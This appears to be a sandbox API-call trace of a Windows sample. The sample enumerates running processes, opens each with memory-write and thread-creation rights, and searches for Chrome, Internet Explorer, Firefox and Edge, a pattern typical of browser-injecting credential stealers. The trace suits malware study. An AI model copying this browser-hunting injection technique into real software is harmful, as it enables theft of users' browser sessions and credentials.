	[0209.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.436] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.436] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.437] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x33cc
	[0209.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.438] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.438] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.438] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.439] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0209.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x33d0
	[0209.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.440] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0209.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.440] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.441] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0209.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.441] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.441] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0209.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x33d4
	[0209.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.442] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.442] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.443] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0209.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.443] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0209.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x33d8
	[0209.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.444] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0209.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.444] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.445] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0209.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.445] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.446] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0209.447] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x33dc
	[0209.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.447] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0209.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.447] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.448] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0209.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.448] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.448] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0209.449] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x33e0
	[0209.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.449] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0209.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.450] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.450] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0209.450] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.450] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.450] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0209.451] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x33e4
	[0209.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.451] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.451] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.451] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.452] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.452] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.452] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.452] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.453] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x33e8
	[0209.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.453] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.453] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.453] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.454] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.454] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.454] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.454] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x33ec
	[0209.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.455] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.455] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.455] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.456] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.456] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.457] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x33f0
	[0209.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.457] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.457] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.457] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.458] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.458] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x33f4
	[0209.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.459] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.459] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.460] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.460] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.460] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x33f8
	[0209.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.461] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.461] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.461] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.462] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.462] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x33fc
	[0209.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.463] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.463] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.463] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.464] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.464] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.464] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.465] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3400
	[0209.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.465] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.465] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.465] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.466] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.466] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0209.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3404
	[0209.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.467] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0209.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.467] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.467] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0209.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.468] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.468] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.468] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3408
	[0209.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.469] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.469] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.469] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.470] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.470] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0209.470] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x340c
	[0209.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.471] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.471] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.471] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.472] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.472] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3410
	[0209.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.473] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.473] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.473] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.474] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.474] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3414
	[0209.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.475] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.475] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.475] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.476] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.476] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0209.477] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3418
	[0209.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.477] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0209.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.477] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.478] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0209.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.478] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.479] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0209.479] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x341c
	[0209.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.479] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0209.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.480] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.480] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0209.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.480] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.481] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0209.481] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x3420
	[0209.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.481] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0209.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.482] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.482] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0209.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.482] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.482] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0209.483] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x3424
	[0209.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.483] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0209.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.483] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.484] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0209.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.484] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.484] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0209.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0209.485] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0209.485] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x3428
	[0209.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.486] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0209.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.486] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.487] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0209.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.487] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.488] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0209.489] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x342c
	[0209.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
